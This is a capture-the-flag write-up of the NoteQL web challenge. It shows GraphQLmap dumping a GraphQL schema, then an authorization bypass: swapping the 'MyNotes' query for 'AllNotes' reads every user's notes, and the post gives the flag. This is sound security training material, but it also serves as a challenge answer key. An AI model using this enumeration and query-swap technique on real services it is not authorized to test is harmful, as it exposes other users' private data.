--- title: "Hack The Box Business CTF 2021: NoteQL" pubDatetime: 2021-07-25T19:21:11.000Z tags: ["hackthebox", "writeup"] description: "Writeup of the web challenge called NoteQL from HackTheBox Business CTF 2021" --- # Challenge Info I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application? # Solution The title of this challenge pretty much tells us straight away that we're dealing with GraphQL. Visiting the website: ![](/images/2021/07/image-42.png) I used a tool called `GraphQLmap` to get a better understanding of the GraphQL we're dealing with. ```bash ┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap] └──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql _____ _ ____ _ / ____| | | / __ \| | | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ | | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \ | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ | | | | |_| |_| Author: @pentest_swissky Version: 1.0 GraphQLmap > dump_new ============= [SCHEMA] =============== e.g: name[Type]: arg (Type!) Query AllNotes[Post]: Note[]: id (ID!), MyNotes[Post]: NotesFrom[Post]: author (String!), Post id[]: title[]: author[]: completed[]: Mutation createNote[]: title (String!), updateNote[]: id (ID!), title (String!), author (String!), completeNote[]: id (ID!), deleteNote[]: id (ID!), __Schema __Type __Field __InputValue __EnumValue __Directive GraphQLmap > ``` We see a query called `AllNotes` - which is quite interesting. After adding a note and clicking on the recently added note (and sending the request through Burp): ![](/images/2021/07/image-44.png) I change `MyNotes` to `AllNotes` in order the dump every note that's stored in this application. ![](/images/2021/07/image-45.png) And here we find the flag! Flag: `HTB{n0b0dy_c0ntr0ls_m3!!}`